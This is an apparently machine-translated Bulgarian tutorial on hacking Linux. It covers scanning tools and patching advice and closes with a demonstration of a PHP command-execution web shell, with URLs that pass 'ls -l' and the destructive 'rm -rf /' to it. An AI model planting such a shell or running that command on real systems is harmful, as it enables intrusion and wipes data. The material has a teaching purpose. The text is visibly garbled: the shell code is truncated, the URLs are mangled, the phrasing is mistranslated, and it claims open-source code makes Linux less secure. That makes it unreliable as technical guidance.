Linux е най-широко използваната сървърна операционна система, особено за уеб сървърите. Той е с отворен код; това означава, че всеки може да има достъп до изходния код. Това го прави по-малко сигурен в сравнение с други операционни системи, тъй като нападателите могат да изучават изходния код, за да намерят уязвимости . Linux за хакери е свързана с експлоатацията на тези уязвимости, за да получи неоторизиран достъп до система.
В тази статия ще ви запознаем с това какво представлява Linux, неговите уязвимости в сигурността, хакерството с Ubuntu и броячните мерки, които можете да въведете.
Теми, обхванати в този урок
- Бърза бележка за Linux
- Инструменти за хакерство на Linux
- Как да предотвратим хакове на Linux
- Хакерска активност: Хакнете Linux система, използваща PHP
Бърза бележка за Linux
Linux е операционна система с отворен код . Има много дистрибуции на базирани на Linux операционни системи като Redhat, Fedora и Ubuntu и др. За разлика от друга операционна система, Linux е по-малко сигурен по отношение на сигурността. Това е така, защото изходният код е достъпен свободно, така че е лесно да го проучите за уязвимости и да ги използвате в сравнение с други операционни системи, които не са с отворен код. Linux може да се използва като операционна система за сървър, десктоп, таблет или мобилно устройство.
Програмите на Linux могат да се управляват с помощта на GUI или команди. Командите на Linux за хакване на Kali Linux са по-ефективни и ефикасни в сравнение с използването на GUI. Поради тази причина помага да се знаят основните команди на Linux за хакване.
Вижте тези уроци https://www.guru99.com/unix-linux-tutorial.html за това как да започнете с хакове на Kali Linux.
Инструменти за хакерство на Linux
- Nessus - този инструмент може да се използва за хакване на Ubuntu, сканиране на конфигурационни настройки, кръпки и мрежи и т.н. може да се намери на https://www.tenable.com/products/nessus
- NMap. Този инструмент може да се използва за наблюдение на хостове, които се изпълняват на сървъра и услугите, които те използват. Може да се използва и за сканиране за портове. Може да се намери на https://nmap.org/
- SARA - SARA е съкращението на изследователския асистент на одитора по сигурността. Както подсказва името, този инструмент може да се използва за одит на мрежи срещу заплахи като SQL Injection, XSS и др. Може да се намери на http://www-arc.com/sara/sara.html
Горният списък не е изчерпателен; тя ви дава представа за инструментите, налични за хакване и хакване на системи на Ubuntu.
Как да предотвратим хакове на Linux
Хакерството на Linux се възползва от уязвимостите в операционната система. Организацията може да приеме следната политика, за да се предпази от подобни атаки.
- Управление на кръпки - корекциите отстраняват грешки, които атакуващите използват, за да компрометират системата. Добрата политика за управление на корекциите ще гарантира, че постоянно прилагате съответни корекции към вашата система.
- Правилна конфигурация на ОС - други експлойти се възползват от слабостите в конфигурацията на сървъра. Неактивните потребителски имена и демони трябва да бъдат деактивирани. Настройките по подразбиране като общи пароли за приложение, потребителски имена по подразбиране и някои номера на портове трябва да бъдат променени.
- Система за откриване на проникване - такива инструменти могат да се използват за откриване на неоторизиран достъп до системата. Някои инструменти имат способността да откриват и предотвратяват подобни атаки.
Хакерска активност: Хакнете система на Ubuntu Linux, използвайки PHP
В този практически сценарий ще научим как да хакнем Ubuntu и ще ви предоставим основна информация за това как можете да използвате PHP за компрометиране на Linux. Няма да се насочим към никоя жертва. Ако искате да го изпробвате, можете да инсталирате LAMPP на вашата локална машина.
PHP се предлага с две функции, които могат да се използват за изпълнение на Linux хакерски команди. Той има функции exec () и shell_exec (). Функцията exec () връща последния ред от изхода на командата, докато shell_exec () връща целия резултат от командата като низ.
За демонстрационни цели, нека приемем, че мениджърите на хакери ще качат следния файл на уеб сървър.
$cmd";$output = shell_exec($cmd);echo "$output";?>
ТУК,
Горният скрипт получава командата от променливата GET с име cmd. Командата се изпълнява с помощта на shell_exec () и резултатите се връщат в браузъра.
Горният код може да бъде използван чрез следния URL адрес
http: //localhost/cp/konsole.php? cmd = ls% 20-l
ТУК,
- “... konsole.php? Cmd = ls% 20-l” присвоява стойността ls -l на променливата cmd .
Командата в Ubuntu за хакване срещу сървъра ще бъде изпълнена като
shell_exec('ls -l') ;
Изпълнението на горния код на уеб сървър дава резултати, подобни на следните.
Горната команда просто показва файловете в текущата директория и разрешенията
Да предположим, че нападателят предава следната команда
rm -rf /
ТУК,
- “Rm” премахва файловете
- “Rf” прави командата rm да се изпълнява в рекурсивен режим. Изтриване на всички папки и файлове
- “/” Инструктира командата да започне да изтрива файлове от основната директория
URL адресът за атака би изглеждал така
http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /
Обобщение
- Linux е популярна операционна система за сървъри, настолни компютри, таблети и мобилни устройства.
- Linux е с отворен код и изходният код може да бъде получен от всеки. Това улеснява откриването на уязвимостите. Това е една от най-добрите ОС за хакери.
- Основните и мрежови команди за хакерство в Ubuntu са ценни за хакерите на Linux.
- Уязвимостите са слабост, която може да се използва за компрометиране на системата.
- Добрата защита може да помогне за защита на системата от компрометиране от нападателя.